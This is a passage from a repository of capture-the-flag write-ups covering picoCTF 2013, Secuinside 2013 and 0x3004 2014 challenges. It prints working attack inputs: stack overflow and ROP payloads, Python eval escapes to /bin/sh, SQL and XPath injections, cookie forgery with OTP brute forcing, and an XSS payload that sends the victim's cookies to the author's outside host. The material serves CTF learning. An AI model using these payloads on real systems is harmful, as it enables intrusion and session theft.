```
├── 2011
│   └── gogoomas2011.pdf
├── 2013
│   ├── codegate_2013
│   │   ├── codegate2013.pdf
│   │   ├── jeopardy_final.png
│   │   ├── web400_exploit.frm
│   │   └── web500.md
│   ├── hdcon_2013
│   │   └── hdcon2013.md
│   ├── juniorctf_2013
│   │   └── juniorctf2013.pdf
│   ├── picoctf_2013
│   │   └── README.md
│   └── secuinside_2013
│       └── README.md
├── 2014
│   ├── 0x3004_2014
│   │   ├── RE
│   │   │   └── README.md
│   │   ├── misc
│   │   │   ├── Misc100_Wireshark
│   │   │   │   └── README.md
│   │   │   ├── Misc10_Wolfram-g4mm4
│   │   │   │   └── solution.jpg
│   │   │   ├── Misc200_DOTO, BEST DOTO
│   │   │   │   ├── solution.txt
│   │   │   │   └── src
│   │   │   │       ├── Form1.frm
│   │   │   │       ├── Project1.vbp
│   │   │   │       └── Project1.vbw
│   │   │   └── Misc50_Hidden1
│   │   │       └── README.md
│   │   ├── scoreboard.png
│   │   ├── task_map.png
│   │   └── web
│   │       ├── README.md
│   │       ├── xyz_bank_success.png
│   │       ├── xyz_template_success.png
│   │       └── xyz_template_trace.png
│   ├── PHDays_2014
│   │   ├── README.md
│   │   ├── backup
│   │   │   ├── Minecraft_really_stereotyped!!.png
│   │   │   ├── PHP_JL.php
│   │   │   └── QUEST_ALL
│   │   │       ├── #PRISM-13-Mar-2012.log
│   │   │       ├── #PRISM-15-Aug-2012.log
│   │   │       ├── #PRISM-20-Feb-2013.log
│   │   │       ├── #PRISM-21-Feb-2013.log
│   │   │       ├── #PRISM-21-May-2013.log
│   │   │       ├── #PRISM-22-May-2013.log
│   │   │       ├── #PRISM-23-Jul-2012.log
│   │   │       ├── #derrorim-09-Jan-2013.log
│   │   │       ├── #derrorim-19-Mar-2013.log
│   │   │       ├── #derrorim-24-Jul-2012.log
│   │   │       ├── #derrorim-25-Dec-2012.log
│   │   │       ├── GeraldMalkin.log
│   │   │       ├── ap0linand0r.log
│   │   │       ├── gerald.zip
│   │   │       └── gerald
│   │   │           ├── README.txt
│   │   │           └── projects
│   │   │               ├── Credentials.txt
│   │   │               ├── Derrorim.txt
│   │   │               ├── Detcelfer Estimate.xlsx
│   │   │               ├── Detcelfer.txt
│   │   │               ├── PRISM.pdf
│   │   │               ├── PRISM.txt
│   │   │               └── Zohers.txt
│   │   └── scoreboard.png
│   ├── RuCTF_2014
│   │   ├── README.md
│   │   ├── RECON
│   │   │   ├── 100_FAVORITE_BOOK
│   │   │   │   ├── 100.txt
│   │   │   │   ├── google_search.png
│   │   │   │   └── oZmiuKnAUs4.jpg
│   │   │   ├── 200_STOLEN_CAMERA
│   │   │   │   └── solution.txt
│   │   │   └── 300_GET_THE_MESSAGE
│   │   │       ├── 1-here.jpg
│   │   │       └── solution.txt
│   │   ├── misc
│   │   │   └── README.md
│   │   ├── ranking.png
│   │   ├── solved.png
│   │   ├── stegano
│   │   │   └── README.md
│   │   └── web
│   │       ├── README.md
│   │       ├── web100.exe
│   │       └── web300.gif
│   ├── codegate_2014
│   │   ├── README.md
│   │   ├── web200.exe
│   │   └── web500.exe
│   ├── csaw_2014
│   │   ├── README.md
│   │   ├── crypto
│   │   │   ├── README.md
│   │   │   └── crypto200.php
│   │   ├── exploitation
│   │   │   └── README.md
│   │   ├── forensic
│   │   │   ├── README.md
│   │   │   └── pdf.pdf
│   │   ├── networking
│   │   │   └── README.md
│   │   ├── re
│   │   │   └── README.md
│   │   ├── recon
│   │   │   └── README.md
│   │   ├── trivia
│   │   │   └── README.md
│   │   └── web
│   │       └── README.md
│   ├── defcon22_finals
│   │   ├── defcon_packet_sniff.zip
│   │   ├── defense.png
│   │   └── ip_list.txt
│   └── secuinside_2014
│       └── Secuinside2014.pdf
├── 2015
│   ├── 0ctf_2015
│   │   └── README.md
│   ├── bctf_2015
│   │   └── README.md
│   ├── codegate_2015
│   │   └── README.md
│   ├── hust_2015
│   │   └── writeup_dcua.pdf
│   ├── inc0gnito_2015
│   │   └── writeup_dcua.pdf
│   ├── jff3_2015
│   │   └── README.md
│   └── polictf_2015
│       └── README.md
├── 2016
│   └── bkp_2016
│       └── README.md
└── README.md
```

/2011/gogoomas2011.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2011/gogoomas2011.pdf
--------------------------------------------------------------------------------
/2013/codegate_2013/codegate2013.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2013/codegate_2013/codegate2013.pdf
--------------------------------------------------------------------------------
/2013/codegate_2013/jeopardy_final.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2013/codegate_2013/jeopardy_final.png
--------------------------------------------------------------------------------
/2013/codegate_2013/web400_exploit.frm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2013/codegate_2013/web400_exploit.frm
--------------------------------------------------------------------------------
/2013/codegate_2013/web500.md:
--------------------------------------------------------------------------------
## Web500 Workout


```
"\x01\x01\x77\x9b\x2a\xce\x2e\x56\x53\xc7\x4d\xac\x53\xc7\x2b\x55\x4f\x09\x36\xf5\x70\x35\xef\x34\x8d\x0e\x30\x87\xf6\x30\xff\x42\x24\xff\xa0\xa1\x08\x12"

wow! key is "W3LC0M3_T0_L0L0L0L"
```

--
src:

```
```

--

```
```

--

```
```
--------------------------------------------------------------------------------
/2013/hdcon_2013/hdcon2013.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2013/hdcon_2013/hdcon2013.md
--------------------------------------------------------------------------------
/2013/juniorctf_2013/juniorctf2013.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2013/juniorctf_2013/juniorctf2013.pdf
--------------------------------------------------------------------------------
/2013/picoctf_2013/README.md:
--------------------------------------------------------------------------------
## Failure to boot

By guessing you get the flag:

```
sda1 .. fail!
fat32.. success!
```

## Read the manual

I coded a ROT-* solver a long time ago, so I ran the ROT-* solver and solved this problem.

Decrypted text:
`IMPORTANT: To enter automatic recovery mode, enter the following recovery key cbcfebeaeeed"`

## XMLOL
You just need to download the xml file and open it with notepad.
But I tried the view-source way:
view-source:https://picoctf.com/problems/xmlol.xml
This flag code was written in the xml file:
`d6b6aba9c44bf3dd58809c46e2c0ffba`

## Technician Challenge
Search for geohot on google and you will find the answer.
I don't exactly remember, but the key is Nissan ~~~

## First Contact
Just look through the hex codes of the pcap file and you will find the answer :)

## Python eval 1
`nc python.picoctf.com 6361`
I didn't use eval to do it, because it's still possible with an easy math calculation.

## Python eval 2
`nc python.picoctf.com 6362`
The point is that you have to use eval to get the flag,
so I tried the exploit shown below:
```
guess> (len(flag), randint(0,9), randint(0,9), randint(0,9), randint(0,9))
guess> (str(flag[:25]), randint(0,9), randint(0,9), randint(0,9), randint(0,9))
i_are_a_pyeval_mastermind
```

## Python eval 3
`nc python.picoctf.com 6363`
__import__ is disabled, but you can find a working path.
```
> path.os.execl("/bin/bash", "")
cat your_flag_here
eval_is_super_OSsome
```

## Python eval 4
`nc python.picoctf.com 6364`

If a GET param like "foo=bar" is sent to the server, the server stores the param as {"a":"b"},
so by escaping from the brackets and the quote sign you can execute /bin/sh successfully.
```
GET /index.html?a=b"+input(path.os.execl("/bin/sh",""))+"a HTTP/1.1
Host: python.picoctf.com:6364
Connection: keep-alive
cat super_awesome_flag
kids_dont_code_like_this_at_home
```

## harder_serial
Just keep your eyes open and understand each line of the code.
Hint: look for the statement that starts with * 0.
42813724579039578812

## Overflow1
Well, it was easier than expected.
We just need to set the variable to \x01.
Since the variable was before the buffer, I tried:
```
./simple_overwrite $(perl -e 'print "\x41"x64 . "\x01";')
```

## Overflow2
It was a similar question to overflow1, but the variable was a little further away.
By using the command below, you can set the variable by overwriting the stack.
```
./stack_overwrite $(perl -e 'print "\x41"x80 . "\x01";')
```

## Overflow3
The question is to call the not_called function, which is at 0x080485f8.
So by using the command below, I called the function and got the shell.
```
./buffer_overflow $(perl -e 'print "\x41"x76 . "\xf8\x85\x04\x08";')
```

## ROP1
The question was to call the function, so..
```
cat <(perl -e 'print "\x41"x36 . "AAAA" . "\xa4\x84\x04\x08"') - | ./rop1
```

## ROP2
As the question says, we have to pass /bin/bash to the system function.
So, the payload should be something like below:
```
["a"*128][bbbb][&system][cccc][&"/bin/bash"]
```
But I couldn't make it successful.
```
cat <(perl -e 'print "\x41"x128 . "BBBB" . "\xb1\x84\x04\x08" . "CCCC" . "\xa0\x84\x04\x08";') - | ./rop2
```

## Chromatophoria
Painted the background black and gotcha!

## GETKey
There's not much to do in this question.
If you look carefully at the GET params, which are foo.php?getparam=blah,
you will figure out that the admin param is false and the other one is ccdc,
so if you change the admin param to true and the other one to pico or picoctf, you get the right answer.

## Injection
The question seemed to be using the eregi function to disallow access for the admin.
So I inserted guest'='guest as the userid, with which all the users get fetched.
At the end, I got all the userids and passwords on one page, including the password for the admin :0

## PHP3
This was the md5-based sql injection.
The point is that the bug exists in PHP.
I didn't want to waste my time bruteforcing for the exploit,
so I googled for the code and got the answer using the code from leetctf 2010.

## PHP4
Well, again it's sql injection.
I did blind sql injection, and the password for admin was 'notarealhash',
so I figured out that you have to make the sql output the password you want.
So, I used the sql code below as the userid so that the password is md5('test'):
```
' AND 1=0 UNION SELECT '098f6bcd4621d373cade4e832627b4f6'#
```
and test as the password. I successfully got the answer.
--------------------------------------------------------------------------------
/2013/secuinside_2013/README.md:
--------------------------------------------------------------------------------
## GiveMeShell

First of all, givemeshell is an "ELF 32-bit LSB executable".
By doing a bit of reverse engineering, you get to know that the challenge executes the first 5 characters of the input in the remote shell.
Since the program accesses the input through the fork, we can use file descriptor 4 (which is the socket) to spawn the shell and list the key.

```
C:\Users\Samsung>nc 119.70.231.180 8765
sh<&4
ls>&4
cat key>&4
key : WeLoveShell
```

## Secure Web

You can upload an image, but the upload does not check the file extension while it checks the content type.
By uploading a file with a php extension and the content-type: image/png, you will be able to list the directory and get the flag.

The flag was in /home/dwh300/flags

```
          ad8888888888ba
        dP'         `"8b,
        8  ,aaa,       "Y888a     ,aaaa,     ,aaa,  ,aa,
        8  8' `8           "8baaaad""""baaaad""""baad""8b
        8  8   8              """"      """"      ""   8b
        8  8,  ,8         ,aaaaaaaaaaaaaaaaaaaaaaaaddddd88P
        8  `"""'       ,d8""
        Yb,         ,ad8"    Congratulations!!!!
         "Y8888888888P"      key is \"!!xx_^s0m3th1ng wr0ng^_yy!!\"
```
--------------------------------------------------------------------------------
/2014/0x3004_2014/RE/README.md:
--------------------------------------------------------------------------------
## PHPVLD

At first sight, I noticed that this challenge looks like a half-decrypted php sourcecode.
I searched for php opcodes and I found this: http://www.php.net/manual/en/internals2.opcodes.list.php

By installing php5vld and fuzzing it, I got the sourcecode below:

```
<?php
error_reporting(0);
require_once 'flag.php';
$addr = $_GET[md5($_SERVER['REMOTE_ADDR'])];
$user = $_GET[md5($_SERVER['HTTP_USER_AGENT'])];
if ($addr != $user) {
    if (md5($addr) === hash('md5', $user)) {
        if (hash('sha512', $addr, true) != hash('sha512', $user, true)) {
            echo "<br><br>You got it here is your flag: " . FLAG;
        }
    }
}

?>
```

I recognised this as an md5 collision, and by googling you can get the strings (http://www.links.org/?p=6).
At the end, you get the flag by inserting the manipulated variables.

--

### original extract
```
phpvld@phpvld:/var/www/$php -d vld.active=1 -d vld.execute=0 -f index.php

Finding entry points
Branch analysis from position: 0
Jump found. Position 1 = 19, Position 2 = 42
Branch analysis from position: 19
Jump found. Position 1 = 26, Position 2 = 41
Branch analysis from position: 26
Jump found. Position 1 = 36, Position 2 = 40
Branch analysis from position: 36
Jump found. Position 1 = 40
Branch analysis from position: 40
Jump found. Position 1 = 41
Branch analysis from position: 41
Jump found. Position 1 = 42
Branch analysis from position: 42
Return found
Branch analysis from position: 40
Branch analysis from position: 41
Branch analysis from position: 42
filename:       /var/www/0x3004/100-phpvld/index.php
function name:  (null)
number of ops:  43
compiled vars:  !0 = $s1, !1 = $s2
line     #  *  op                           fetch          ext  return  operands
---------------------------------------------------------------------------------
   2     0  >   SEND_VAL                                                 0
         1      DO_FCALL                                      1          'error_reporting'
   3     2      INCLUDE_OR_EVAL                                          'flag.php', REQUIRE_ONCE
   4     3      FETCH_R                      global              $3      '_SERVER'
         4      FETCH_DIM_R                                      $4      $3, 'REMOTE_ADDR'
         5      SEND_VAR                                                 $4
         6      DO_FCALL                                      1  $5      'md5'
         7      FETCH_R                      global              $2      '_GET'
         8      FETCH_DIM_R                                      $6      $2, $5
         9      ASSIGN                                                   !0, $6
   5    10      FETCH_R                      global              $9      '_SERVER'
        11      FETCH_DIM_R                                      $10     $9, 'HTTP_USER_AGENT'
        12      SEND_VAR                                                 $10
        13      DO_FCALL                                      1  $11     'md5'
        14      FETCH_R                      global              $8      '_GET'
        15      FETCH_DIM_R                                      $12     $8, $11
        16      ASSIGN                                                   !1, $12
   6    17      IS_NOT_EQUAL                                     ~14     !0, !1
   7    18    > JMPZ                                                     ~14, ->42
        19  >   SEND_VAR                                                 !0
        20      DO_FCALL                                      1  $15     'md5'
        21      SEND_VAL                                                 'md5'
        22      SEND_VAR                                                 !1
        23      DO_FCALL                                      2  $16     'hash'
        24      IS_IDENTICAL                                     ~17     $15, $16
   8    25    > JMPZ                                                     ~17, ->41
        26  >   SEND_VAL                                                 'sha512'
        27      SEND_VAR                                                 !0
        28      SEND_VAL                                                 true
        29      DO_FCALL                                      3  $18     'hash'
        30      SEND_VAL                                                 'sha512'
        31      SEND_VAR                                                 !1
        32      SEND_VAL                                                 true
        33      DO_FCALL                                      3  $19     'hash'
        34      IS_NOT_EQUAL                                     ~20     $18, $19
   9    35    > JMPZ                                                     ~20, ->40
        36  >   FETCH_CONSTANT                                   ~21     'FLAG'
        37      CONCAT                                           ~22     'You+got+it+%3B%29+Here+is+your+flag%3A+', ~21
        38      ECHO                                                     ~22
        39    > JMP                                                      ->40
  10    40  > > JMP                                                      ->41
        41  > > JMP                                                      ->42
        42  > > RETURN                                                   1

branch: #  0; line:     2-    7; sop:     0; eop:    18; out1:  19; out2:  42
branch: # 19; line:     7-    8; sop:    19; eop:    25; out1:  26; out2:  41
branch: # 26; line:     8-    9; sop:    26; eop:    35; out1:  36; out2:  40
branch: # 36; line:     9-    9; sop:    36; eop:    39; out1:  40
branch: # 40; line:    10-   10; sop:    40; eop:    40; out1:  41
branch: # 41; line:    10-   10; sop:    41; eop:    41; out1:  42
branch: # 42; line:    10-   10; sop:    42; eop:    42
path #1: 0, 19, 26, 36, 40, 41, 42,
path #2: 0, 19, 26, 40, 41, 42,
path #3: 0, 19, 41, 42,
path #4: 0, 42,
```

--

### my extract

```
[root@localhost test]# php -d vld.active=1 -d vld.execute=0 -f index.php
Finding entry points
Branch analysis from position: 0
Jump found. Position 1 = 19, Position 2 = 42
Branch analysis from position: 19
Jump found. Position 1 = 26, Position 2 = 41
Branch analysis from position: 26
Jump found. Position 1 = 36, Position 2 = 40
Branch analysis from position: 36
Jump found. Position 1 = 40
Branch analysis from position: 40
Jump found. Position 1 = 41
Branch analysis from position: 41
Jump found. Position 1 = 42
Branch analysis from position: 42
Return found
Branch analysis from position: 40
Branch analysis from position: 41
Branch analysis from position: 42
filename:       /root/test/index.php
function name:  (null)
number of ops:  43
compiled vars:  !0 = $addr, !1 = $user
line     #  *  op                           fetch          ext  return  operands
---------------------------------------------------------------------------------
   2     0  >   SEND_VAL                                                 0
         1      DO_FCALL                                      1          'error_reporting'
   3     2      INCLUDE_OR_EVAL                                          'flag.php', REQUIRE_ONCE
   4     3      FETCH_R                      global              $3      '_SERVER'
         4      FETCH_DIM_R                                      $4      $3, 'REMOTE_ADDR'
         5      SEND_VAR                                                 $4
         6      DO_FCALL                                      1  $5      'md5'
         7      FETCH_R                      global              $2      '_GET'
         8      FETCH_DIM_R                                      $6      $2, $5
         9      ASSIGN                                                   !0, $6
   5    10      FETCH_R                      global              $9      '_SERVER'
        11      FETCH_DIM_R                                      $10     $9, 'HTTP_USER_AGENT'
        12      SEND_VAR                                                 $10
        13      DO_FCALL                                      1  $11     'md5'
        14      FETCH_R                      global              $8      '_GET'
        15      FETCH_DIM_R                                      $12     $8, $11
        16      ASSIGN                                                   !1, $12
   6    17      IS_NOT_EQUAL                                     ~14     !0, !1
        18    > JMPZ                                                     ~14, ->42
   7    19  >   SEND_VAR                                                 !0
        20      DO_FCALL                                      1  $15     'md5'
        21      SEND_VAL                                                 'md5'
        22      SEND_VAR                                                 !1
        23      DO_FCALL                                      2  $16     'hash'
        24      IS_IDENTICAL                                     ~17     $15, $16
        25    > JMPZ                                                     ~17, ->41
   8    26  >   SEND_VAL                                                 'sha512'
        27      SEND_VAR                                                 !0
        28      SEND_VAL                                                 true
        29      DO_FCALL                                      3  $18     'hash'
        30      SEND_VAL                                                 'sha512'
        31      SEND_VAR                                                 !1
        32      SEND_VAL                                                 true
        33      DO_FCALL                                      3  $19     'hash'
        34      IS_NOT_EQUAL                                     ~20     $18, $19
        35    > JMPZ                                                     ~20, ->40
   9    36  >   FETCH_CONSTANT                                   ~21     'FLAG'
        37      CONCAT                                           ~22     '%3Cbr%3E%3Cbr%3EYou+got+it+here+is+your+flag%3A+', ~21
        38      ECHO                                                     ~22
  10    39    > JMP                                                      ->40
  11    40  > > JMP                                                      ->41
  12    41  > > JMP                                                      ->42
  14    42  > > RETURN                                                   1

branch: #  0; line:     2-    6; sop:     0; eop:    18; out1:  19; out2:  42
branch: # 19; line:     7-    7; sop:    19; eop:    25; out1:  26; out2:  41
branch: # 26; line:     8-    8; sop:    26; eop:    35; out1:  36; out2:  40
branch: # 36; line:     9-   10; sop:    36; eop:    39; out1:  40
branch: # 40; line:    11-   11; sop:    40; eop:    40; out1:  41
branch: # 41; line:    12-   12; sop:    41; eop:    41; out1:  42
branch: # 42; line:    14-   14; sop:    42; eop:    42
path #1: 0, 19, 26, 36, 40, 41, 42,
path #2: 0, 19, 2, 40, 41, 42,
path #3: 0, 19, 41, 42,
path #4: 0, 42,
[root@localhost test]#
```
--------------------------------------------------------------------------------
/2014/0x3004_2014/misc/Misc100_Wireshark/README.md:
--------------------------------------------------------------------------------
### Wireshark

Since it is based on HTTP packets,

1) convert the file extension from pcapng to txt
2) Open with a notepad
3) Ctrl+F(Find) for 0x3004
4) profit!

```
I send you a wireshark logo and the flag 0x3004{I_l0v3_wir35h4rk_S0_MUCH!}.
```

--------------------------------------------------------------------------------
/2014/0x3004_2014/misc/Misc10_Wolfram-g4mm4/solution.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2014/0x3004_2014/misc/Misc10_Wolfram-g4mm4/solution.jpg
--------------------------------------------------------------------------------
/2014/0x3004_2014/misc/Misc200_DOTO, BEST DOTO/solution.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2014/0x3004_2014/misc/Misc200_DOTO, BEST DOTO/solution.txt
--------------------------------------------------------------------------------
/2014/0x3004_2014/misc/Misc200_DOTO, BEST DOTO/src/Form1.frm:
--------------------------------------------------------------------------------
VERSION 5.00
Begin VB.Form Form1 
   Caption         =   "Form1"
   ClientHeight    =   3195
   ClientLeft      =   60
   ClientTop       =   345
   ClientWidth     =   4680
   LinkTopic       =   "Form1"
   ScaleHeight     =   3195
   ScaleWidth      =   4680
   StartUpPosition =   3  'Windows Default
   Begin VB.CommandButton Command1 
      Caption         =   "Command1"
      Height          =   855
      Left            =   480
      TabIndex        =   0
      Top             =   600
      Width           =   2295
   End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Private Sub Command1_Click()
    Dim winhttp As New winhttp.WinHttpRequest
    Dim no$, att() As Variant, trial$, dump$
    On Error GoTo GiveMeFlag
    att = Array("50", "125", "115", "100", "50", "150", "150", "150", "175", "225", "250", "450", "200", "325", "350", "450", "470", "485", "500", "525", "500", "600", "800", "875", "2250", "2670", "2700", "2700", "2150", "2600", "2950", "3000", "2125", "2200", "2225", "3300", "1850", "1900", "2050", "2050", "275", "875", "875", "1000", "1750", "3300", "5050", "6200", "135", "200", "250", "325", "550", "1450", "1350", "1400")
    'MsgBox att(46)
    'Exit Sub
    winhttp.Open "GET", "http://challenges.wargame.vn/200-doto_8a89b5cb130e8e18259b1ec13595c39c/"
    winhttp.SetRequestHeader "Cookie", "PHPSESSID=givemeleflag"
    winhttp.Send
    dump = winhttp.ResponseText
    trial = Split(Split(winhttp.ResponseText, " TIMES REMAINING!")(0), "")(1)
    no = Split(Split(winhttp.ResponseText, "")(0)
    Form1.Caption = trial
    On Error Resume Next
    dump = att(no)
    If dump = vbNullString Or dump = 0 Then
        dump = 2150
    End If
    winhttp.Open "POST", "http://challenges.wargame.vn/200-doto_8a89b5cb130e8e18259b1ec13595c39c/"
    winhttp.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    winhttp.SetRequestHeader "Cookie", "PHPSESSID=givemele_flag"
    winhttp.Send "gold=" & att(no)
    winhttp.WaitForResponse
    Exit Sub
GiveMeFlag:
    MsgBox winhttp.ResponseText

End Sub
--------------------------------------------------------------------------------
/2014/0x3004_2014/misc/Misc200_DOTO, BEST DOTO/src/Project1.vbp:
--------------------------------------------------------------------------------
Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\Windows\SysWOW64\stdole2.tlb#OLE Automation
Reference=*\G{662901FC-6951-4854-9EB2-D9A2570F2B2E}#5.1#0#..\..\..\..\windows\system32\winhttp.dll#Microsoft WinHTTP Services, version 5.1
Form=Form1.frm
Startup="Form1"
Command32=""
Name="Project1"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="IMFASTKR"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
--------------------------------------------------------------------------------
/2014/0x3004_2014/misc/Misc200_DOTO, BEST DOTO/src/Project1.vbw:
--------------------------------------------------------------------------------
Form1 = 44, 44, 956, 520, , 22, 22, 934, 498, C
--------------------------------------------------------------------------------
/2014/0x3004_2014/misc/Misc50_Hidden1/README.md:
--------------------------------------------------------------------------------
## Hidden 1

```
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Harold>nc challenges.wargame.vn 80
GET / HTTP/1.0
Host: challenges.wargame.vn

HTTP/1.1 200 OK
Date: Wed, 30 Apr 2014 04:38:14 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.8
Vary: Accept-Encoding
Content-Length: 47
Connection: close
Content-Type: text/html


C:\Users\Harold>
```
--------------------------------------------------------------------------------
/2014/0x3004_2014/scoreboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2014/0x3004_2014/scoreboard.png
--------------------------------------------------------------------------------
/2014/0x3004_2014/task_map.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2014/0x3004_2014/task_map.png
--------------------------------------------------------------------------------
/2014/0x3004_2014/web/README.md:
--------------------------------------------------------------------------------
## Path to Pro

It was a bit of a tricky challenge.

The admin had given the hint in the IRC channel itself that the title is the hint.
First I found out that the SQL injection works on the pass or user param.

```
REQUEST: http://challenges.wargame.vn/100-path-to-pro_548f20feaa3736e0c7320fc5e5b14a8c/?name=guest&pass=1%22+or+1+and+%221
RESULT:
nothing, flag is not here ;)
Maybe if you login as 'admin' you will find my secret
```

However, I found something weird; only the substring() function worked and nothing else was working.
After searching the problem for hours, I later found out that the login runs with xpath checks.

```
REQUEST: http://challenges.wargame.vn/100-path-to-pro_548f20feaa3736e0c7320fc5e5b14a8c/?name=guest&pass=-1%22+or+count(//user/child::node())=5+and+%221
RESULT:
nothing, flag is not here ;)
Maybe if you login as 'admin' you will find my secret
```

After using some xpath injections, I successfully got the flag with a decent path listing.

```
REQUEST: http://challenges.wargame.vn/100-path-to-pro_548f20feaa3736e0c7320fc5e5b14a8c/?name=guest&pass=1%22]%20|%20//*%20|//*[%221%22=%221
RESULT:



nothing, flag is not here ;)



Maybe if you login as 'admin' you will find my secret



0x3004{XXXpath}
```

flag: `0x3004{XXXpath}`


--

## XYZ BANK

I found out that the cookie has credentials.

```
document.cookie
credential="WyJndWVzdCIsICJndWVzdCIsICIxMjM0Il0="
```

So if I decode the base64 string,
```
atob("WyJndWVzdCIsICJndWVzdCIsICIxMjM0Il0=")
'["guest", "guest", "1234"]'
```

it becomes `["guest", "guest", "1234"]`, from which I can now assume that the cookie is JSON.

As I went further, I found out that it redirects to the page if I write True, but it gives a credential error with true.

Considering that I can bypass the username,
I successfully bypassed the password verification after trying out several values based on the errors I got.

```
document.cookie='credential="'+btoa('["guest",True,1234]')+'"';
document.location.href="http://challenges.wargame.vn:50003/";
(Redirects)

..

document.cookie='credential="'+btoa('["guest",1,1234]')+'"';
document.location.href="http://challenges.wargame.vn:50003/";
(Wrong credentials)

..

document.cookie='credential="'+btoa('["guest",False,1234]')+'"';
document.location.href="http://challenges.wargame.vn:50003/";
(Redirects)

..

document.cookie='credential="'+btoa('["guest",0,1234]')+'"';
document.location.href="http://challenges.wargame.vn:50003/";
(info page)
```

So, I can now access admin by bruteforcing the OTP!

```
document.cookie='credential="'+btoa('["admin",0,0001]')+'"';
document.location.href="http://challenges.wargame.vn:50003/";
(Wrong credentials)

..

document.cookie='credential="'+btoa('["admin",0,7331]')+'"';
document.location.href="http://challenges.wargame.vn:50003/";
(info page)
```

![success](xyz_bank_success.png)

Flag is: `Good boy! 0x3004{goooo_home_homie}`

--

## XYZ TEMPLATE

If I log in as guest/guest, we find a page with template input textboxes.
Above that, we also see a feedback form to write out a few details.

I also decoded the username and password from the cookies.
```
document.cookie
"username=guest; password=guest"
```

I can now conclude that this question is obviously about XSS, since this is a website with html input available and a way to send stuff to the admin.
Anyway, we first input the default values in the input box and submit.

```
HTML: (default)
PARAMS: (default)
http://challenges.wargame.vn:50004/template/41845810235ae981f0f8ed2d80580e7a)
```

Let's have a look at the sourcecode of the template page.

```
setTimeout(function(){
    var html = document.getElementById('html').value;
    var params = (function(){
        var obj = JSON.parse(document.getElementById('params').value);
        return obj;
    })();
    console.dir(params);
    var render_tmpl = new tmpl(html,params);
    document.getElementById('result').innerHTML = render_tmpl.render();
},300);

function tmpl(content,params){
    String.prototype.header = function(){
        return "[header]"+this.toString()+"[/header]"
    }
    this.content = content;
    this.params = params || {};
    this.anti_xss = function(input){
        return input.toString()
            .replace(/&/g,'&amp;')
            .replace(/</g,'&lt;')
            .replace(/>/g,'&gt;')
            .replace(/'/g,'&#39;')
            .replace(/"/g,'&quot;')
    }
    this.filter_blacklist = function(input){
        var blacklist = /this|document|window|object|function|top|parent|eval|script|alert|prompt/gi
        // hm...
        return input.replace(blacklist,"..")
    }
    this.render = function(params){
        this.params = params || this.params;
        while(x = /<%=([\w\.\(\)]+)%>/g.exec(this.content)){
            eval("var p = this.params."+this.filter_blacklist(x[1]));
            this.content = this.content.replace(x[0],p);
        }
        return this.anti_xss(this.content)
            .replace(/\n/g,"<br>")
            .replace('[header]',''); // newline to br
    };
}
```

...?
Yes!!
There is nothing more to talk about: we see that the code has an eval() function.
However, it has all this blacklisted stuff, and all I know now is that the injection has to be done with asp-like tags.

By searching through some functions for a while, I found out that the constructor method can be called, which will eventually load the function.

If we input this and check the console log for testing:

```
HTML: <%=title.header.constructor(console.log(1))()%>
PARAM: (default)
=> http://challenges.wargame.vn:50004/template/a1e1ce29099ba4dbe3b4f168bae6bd62
```

I get the value "1" in the console log. This confirms that there is an XSS vulnerability.
As we go further, I realize that the filters can be bypassed after the ASP-like tags.

So if I use some string functions like `substr` or `indexOf`, we can call javascript stuff within the constructor.

So if we input this for the xss:
```
HTML: <%=lol.header.constructor(html.value.substr(52))()%>document.location.href='http://stypr.com/xss.pl?xss='+document.cookie;
PARAM: {"lol":"penthackon"}
=> http://challenges.wargame.vn:50004/template/5656b0f5e5f86f9b23c1c2d7c517370e
```

It gives a 404 page, but it has been redirected to my website with the cookies on it.


Now, the feedback one.
They ask for a Debug URL for any problem, but if we put
```
http://challenges.wargame.vn:50004/debug/5656b0f5e5f86f9b23c1c2d7c517370e
```

this won't work from the server side, because this will only be output as a text file.
So, if we bypass it with LFI-style path traversal, we can successfully send the template page with the XSS on it:
```
http://challenges.wargame.vn:50004/debug/areyouserious/../../template/5656b0f5e5f86f9b23c1c2d7c517370e
```

![success](xyz_template_success.png)

--------------------------------------------------------------------------------
/2014/0x3004_2014/web/xyz_bank_success.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2014/0x3004_2014/web/xyz_bank_success.png
--------------------------------------------------------------------------------
/2014/0x3004_2014/web/xyz_template_success.png:
--------------------------------------------------------------------------------
